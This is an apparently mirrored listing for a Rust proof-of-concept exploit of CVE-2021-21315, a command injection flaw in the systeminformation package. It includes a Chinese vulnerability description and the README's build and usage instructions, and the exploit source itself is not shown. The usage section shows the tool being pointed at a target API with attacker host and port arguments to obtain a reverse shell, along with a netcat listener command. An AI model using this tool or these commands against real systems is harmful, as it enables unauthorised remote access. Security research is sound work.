CVE-2021-21315 PoC — Systeminformation 操作系统命令注入漏洞

Source

https://github.com/G01d3nW01f/CVE-2021-21315

Associated Vulnerability

Title:Systeminformation 操作系统命令注入漏洞 (CVE-2021-21315)
Description:Systeminformation中存在操作系统命令注入漏洞，该漏洞源于外部输入数据构造操作系统可执行命令过程中，网络系统或产品未正确过滤其中的特殊字符、命令等。攻击者可利用该漏洞执行非法操作系统命令。

Description

rust noob tried write easy exploit code with rust lang

Readme

# the CVE-2021-21315's exploit code wrote with Rust lang

I'm rust noob so this code was my part of RustLang practices

Yes!!Let's Get the reverse shell!!!!!!!!!!

[!]for education or researching only

# Build
  ```
  cargo build
  
  ```

# Usage

  ```
  ./exploit <targetURL/path/of/api> <LHOST> <LPORT>
  
  ./exploit http://target.com/api/osinfo?param 172.17.2.1 1234   
  ```
  
# need Netcat for Listener to catch reverse shell
  ```
  
  nc -nlvp <lport>
  nc -nlvp 1234
  ```
  
  
![alt text](https://github.com/Ki11i0n4ir3/gifs/blob/main/daddy.gif)

File Snapshot


 [4.0K]  /data/pocs/ac97714cb3d814b0c8d5e6cae881b1210b26b19c
├── [ 273]  Cargo.toml
├── [ 560]  README.md
└── [4.0K]  src
    └── [4.3K]  main.rs

1 directory, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!